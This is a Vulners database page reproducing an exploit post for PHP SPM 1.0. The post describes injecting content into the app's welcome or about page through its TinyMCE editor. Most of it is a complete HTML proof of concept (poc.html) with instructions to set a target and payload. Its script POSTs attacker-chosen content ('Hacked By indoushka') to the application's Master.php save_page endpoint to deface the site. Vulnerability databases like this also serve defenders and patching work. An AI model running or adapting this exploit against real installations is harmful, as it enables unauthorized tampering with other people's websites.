Vulners
Lucene search
PHP SPM 1.0 WYSIWYG Code Injection
`=============================================================================================================================================
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================
poc :
[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php .
[+] Line 86 : Set your Target.
[+] Line 27 : set your payload. <textarea name="page[welcome] ===> You can type welcome or about.
[+] save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome Page Editor</title>
<script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
<main id="main" class="main">
<div class="pagetitle">
<h1>Welcome Page</h1>
<nav>
<ol class="breadcrumb">
<li class="breadcrumb-item active">Welcome Page</li>
</ol>
</nav>
</div>
<div id="msg-container"></div>
<div class="card rounded-0">
<div class="card-body rounded-0 pt-4">
<div class="container-fluid">
<form id="page-form">
<textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
</form>
</div>
</div>
<div class="card-footer">
<div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
<button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
</div>
</div>
</div>
<div id="loader" style="display:none;">Loading...</div>
<div id="toast"></div>
<script>
// Initialize TinyMCE
tinymce.init({
selector: 'textarea.tinymce-editor',
height: 300,
menubar: false,
plugins: [
'advlist autolink lists link image charmap print preview anchor',
'searchreplace visualblocks code fullscreen',
'insertdatetime media table paste code help wordcount'
],
toolbar: 'undo redo | formatselect | bold italic backcolor | ' +
'alignleft aligncenter alignright alignjustify | ' +
'bullist numlist outdent indent | removeformat | help'
});
// Loader functions
function start_loader() {
document.getElementById('loader').style.display = 'block';
}
function end_loader() {
document.getElementById('loader').style.display = 'none';
}
// Toast function
function showMessage(message, type) {
const messageDiv = document.getElementById('toast');
messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
setTimeout(() => {
messageDiv.innerHTML = '';
}, 3000);
}
// Form submit event listener
document.getElementById('page-form').addEventListener('submit', function(e) {
e.preventDefault(); // Prevent page reload
// Start loader
start_loader();
const formData = new FormData(this); // Get form data
const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object
// Set up request
xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);
// Handle response
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
end_loader();
if (xhr.status === 200) {
const response = JSON.parse(xhr.responseText);
if (response.status === 'success') {
showMessage('Page updated successfully!', 'success');
location.reload(); // Reload the page if successful
} else if (response.status === 'failed' && response.msg) {
showMessage(response.msg, 'error');
} else {
showMessage('An unknown error occurred.', 'error');
}
} else {
showMessage('Error: ' + xhr.statusText, 'error');
}
}
};
// Send the request
xhr.send(formData);
});
</script>
</main>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4